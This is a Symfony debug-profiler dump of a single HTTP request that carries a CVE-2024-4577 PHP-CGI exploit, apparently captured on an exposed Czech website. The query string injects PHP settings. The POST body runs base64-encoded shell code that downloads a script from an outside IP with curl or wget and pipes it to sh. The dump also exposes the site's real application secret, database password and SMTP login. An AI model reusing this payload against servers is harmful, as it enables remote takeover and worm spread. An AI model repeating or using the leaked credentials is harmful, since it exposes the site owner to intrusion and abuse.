PageController :: getPage
Request
GET Parameters
Key | Value |
---|---|
�d_allow_url_include=1_�d_auto_prepend_file=php://input | "" |
POST Parameters
Key | Value |
---|---|
<?php_shell_exec(base64_decode("WD0kKGN1cmwgaHR0cDovLzQ1LjIwMi4zNS4xOTAvc2ggfHwgd2dldCBodHRwOi8vNDUuMjAyLjM1LjE5MC9zaCAtTy0pOyBlY2hvICIkWCIgfCBzaCAtcyBjdmVfMjAyNF80NTc3LnNlbGZyZXA | "")); echo(md5("Hello CVE-2024-4577")); ?>" |
Uploaded Files
No files were uploaded
Request Attributes
Key | Value |
---|---|
_controller | "App\Controller\Web\PageController::getPage" |
_firewall_context | "security.firewall.map.context.main" |
_links | Fig\Link\GenericLinkProvider {#1971 -links: [ "00000000000007b20000000000000000" => Fig\Link\Link {#1970 -href: "https://190.2.155.146/api/docs.jsonld" -rel: [ "http://www.w3.org/ns/hydra/core#apiDocumentation" => true ] -attributes: [] } ] } |
_remove_csp_headers | true |
_route | "web_get_page" |
_route_params | [ "slug" => "hello.world" ] |
_security_firewall_run | "_security_main" |
_stopwatch_token | "11fd95" |
slug | "hello.world" |
Request Headers
Header | Value |
---|---|
accept | "*/*" |
connection | "keep-alive" |
content-length | "221" |
content-type | "application/x-www-form-urlencoded" |
host | "190.2.155.146:443" |
upgrade-insecure-requests | "1" |
user-agent | "Custom-AsyncHttpClient" |
x-php-ob-level | "1" |
Request Content
Raw
<?php shell_exec(base64_decode("WD0kKGN1cmwgaHR0cDovLzQ1LjIwMi4zNS4xOTAvc2ggfHwgd2dldCBodHRwOi8vNDUuMjAyLjM1LjE5MC9zaCAtTy0pOyBlY2hvICIkWCIgfCBzaCAtcyBjdmVfMjAyNF80NTc3LnNlbGZyZXA=")); echo(md5("Hello CVE-2024-4577")); ?>
Response
Response Headers
Header | Value |
---|---|
cache-control | "no-cache, private" |
content-type | "text/html; charset=UTF-8" |
date | "Mon, 25 Nov 2024 19:52:27 GMT" |
link | "<https://190.2.155.146/api/docs.jsonld>; rel="http://www.w3.org/ns/hydra/core#apiDocumentation"" |
x-debug-exception | "Str%C3%A1nka%20nenalezena%21" |
x-debug-exception-file | "%2Fvar%2Fprojects%2Fprozili%2Fvendor%2Fsymfony%2Fframework-bundle%2FController%2FAbstractController.php:340" |
x-debug-token | "f140dc" |
x-debug-token-link | "https://190.2.155.146/_profiler/939256" |
x-previous-debug-token | "939256" |
x-robots-tag | "noindex" |
Cookies
Request Cookies
No request cookies
Response Cookies
No response cookies
Session 1
Session Metadata
No session metadata
Session Attributes
No session attributes
Session Usage
1
Usages
Stateless check enabled
Usage |
---|
Symfony\Component\Security\Core\Authentication\Token\Storage\UsageTrackingTokenStorage:44
[ [ "file" => "/var/projects/prozili/vendor/symfony/security-core/Authentication/Token/Storage/UsageTrackingTokenStorage.php" "line" => 44 "function" => "getMetadataBag" "class" => "Symfony\Component\HttpFoundation\Session\Session" "type" => "->" ] [ "file" => "/var/projects/prozili/vendor/symfony/security-http/Firewall/AccessListener.php" "line" => 87 "function" => "getToken" "class" => "Symfony\Component\Security\Core\Authentication\Token\Storage\UsageTrackingTokenStorage" "type" => "->" ] [ "file" => "/var/projects/prozili/vendor/symfony/security-bundle/Debug/WrappedLazyListener.php" "line" => 49 "function" => "authenticate" "class" => "Symfony\Component\Security\Http\Firewall\AccessListener" "type" => "->" ] [ "file" => "/var/projects/prozili/vendor/symfony/security-http/Firewall/AbstractListener.php" "line" => 26 "function" => "authenticate" "class" => "Symfony\Bundle\SecurityBundle\Debug\WrappedLazyListener" "type" => "->" ] [ "file" => "/var/projects/prozili/vendor/symfony/security-bundle/Security/LazyFirewallContext.php" "line" => 60 "function" => "__invoke" "class" => "Symfony\Component\Security\Http\Firewall\AbstractListener" "type" => "->" ] [ "file" => "/var/projects/prozili/vendor/symfony/security-bundle/Debug/TraceableFirewallListener.php" "line" => 70 "function" => "__invoke" "class" => "Symfony\Bundle\SecurityBundle\Security\LazyFirewallContext" "type" => "->" ] [ "file" => "/var/projects/prozili/vendor/symfony/security-http/Firewall.php" "line" => 92 "function" => "callListeners" "class" => "Symfony\Bundle\SecurityBundle\Debug\TraceableFirewallListener" "type" => "->" ] [ "file" => "/var/projects/prozili/vendor/symfony/event-dispatcher/Debug/WrappedListener.php" "line" => 117 "function" => "onKernelRequest" "class" => "Symfony\Component\Security\Http\Firewall" "type" => "->" ] [ "file" => "/var/projects/prozili/vendor/symfony/event-dispatcher/EventDispatcher.php" "line" => 230 "function" => "__invoke" "class" => "Symfony\Component\EventDispatcher\Debug\WrappedListener" "type" => "->" ] [ "file" => "/var/projects/prozili/vendor/symfony/event-dispatcher/EventDispatcher.php" "line" => 59 "function" => "callListeners" "class" => "Symfony\Component\EventDispatcher\EventDispatcher" "type" => "->" ] [ "file" => "/var/projects/prozili/vendor/symfony/event-dispatcher/Debug/TraceableEventDispatcher.php" "line" => 154 "function" => "dispatch" "class" => "Symfony\Component\EventDispatcher\EventDispatcher" "type" => "->" ] [ "file" => "/var/projects/prozili/vendor/symfony/http-kernel/HttpKernel.php" "line" => 129 "function" => "dispatch" "class" => "Symfony\Component\EventDispatcher\Debug\TraceableEventDispatcher" "type" => "->" ] [ "file" => "/var/projects/prozili/vendor/symfony/http-kernel/HttpKernel.php" "line" => 75 "function" => "handleRaw" "class" => "Symfony\Component\HttpKernel\HttpKernel" "type" => "->" ] [ "file" => "/var/projects/prozili/vendor/symfony/http-kernel/Kernel.php" "line" => 202 "function" => "handle" "class" => "Symfony\Component\HttpKernel\HttpKernel" "type" => "->" ] [ "file" => "/var/projects/prozili/vendor/symfony/runtime/Runner/Symfony/HttpKernelRunner.php" "line" => 35 "function" => "handle" "class" => "Symfony\Component\HttpKernel\Kernel" "type" => "->" ] [ "file" => "/var/projects/prozili/vendor/autoload_runtime.php" "line" => 35 "function" => "run" "class" => "Symfony\Component\Runtime\Runner\Symfony\HttpKernelRunner" "type" => "->" ] [ "file" => "/var/projects/prozili/public/index.php" "line" => 5 "args" => [ "/var/projects/prozili/vendor/autoload_runtime.php" ] "function" => "require_once" ] ] |
Flashes
Flashes
No flash messages were created.
Server Parameters
Server Parameters
Defined in .env
Key | Value |
---|---|
APP_ENV | "dev" |
APP_SECRET | "e2a7839a56fde13bb275757b3993fa4e" |
CORS_ALLOW_ORIGIN | "^https?://(localhost|127\.0\.0\.1)(:[0-9]+)?$" |
DATABASE_URL | "mysql://greendot:NecumV@localhost:3306/prozili?serverVersion=mariadb-10.5.15&charset=utf8" |
MAILER_DSN | "smtp://info@tohlejsmeprozili.cz:gRLc8bZu2mag@smtp.tohlejsmeprozili.cz:587" |
MESSENGER_TRANSPORT_DSN | "doctrine://default?auto_setup=0" |
Defined as regular env variables
Key | Value |
---|---|
APP_DEBUG | "1" |
CONTENT_LENGTH | "221" |
CONTENT_TYPE | "application/x-www-form-urlencoded" |
CONTEXT_DOCUMENT_ROOT | "/var/projects/prozili/public" |
CONTEXT_PREFIX | "" |
DOCUMENT_ROOT | "/var/projects/prozili/public" |
FCGI_ROLE | "RESPONDER" |
GATEWAY_INTERFACE | "CGI/1.1" |
HOME | "/var/www" |
HTTPS | "on" |
HTTP_ACCEPT | "*/*" |
HTTP_CONNECTION | "keep-alive" |
HTTP_HOST | "190.2.155.146:443" |
HTTP_UPGRADE_INSECURE_REQUESTS | "1" |
HTTP_USER_AGENT | "Custom-AsyncHttpClient" |
PATH | "/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin" |
PHP_SELF | "/index.php" |
QUERY_STRING | "%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" |
REDIRECT_HTTPS | "on" |
REDIRECT_QUERY_STRING | "%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" |
REDIRECT_STATUS | "200" |
REDIRECT_URL | "/hello.world" |
REMOTE_ADDR | "101.126.16.175" |
REMOTE_PORT | "41666" |
REQUEST_METHOD | "POST" |
REQUEST_SCHEME | "https" |
REQUEST_TIME | 1732564347 |
REQUEST_TIME_FLOAT | 1732564347.0708 |
REQUEST_URI | "/hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" |
SCRIPT_FILENAME | "/var/projects/prozili/public/index.php" |
SCRIPT_NAME | "/index.php" |
SERVER_ADDR | "190.2.155.146" |
SERVER_ADMIN | "[no address given]" |
SERVER_NAME | "190.2.155.146" |
SERVER_PORT | "443" |
SERVER_PROTOCOL | "HTTP/1.1" |
SERVER_SIGNATURE | "" |
SERVER_SOFTWARE | "Apache" |
SYMFONY_DOTENV_VARS | "APP_ENV,APP_SECRET,MESSENGER_TRANSPORT_DSN,DATABASE_URL,MAILER_DSN,CORS_ALLOW_ORIGIN" |
USER | "www-data" |
proxy-nokeepalive | "1" |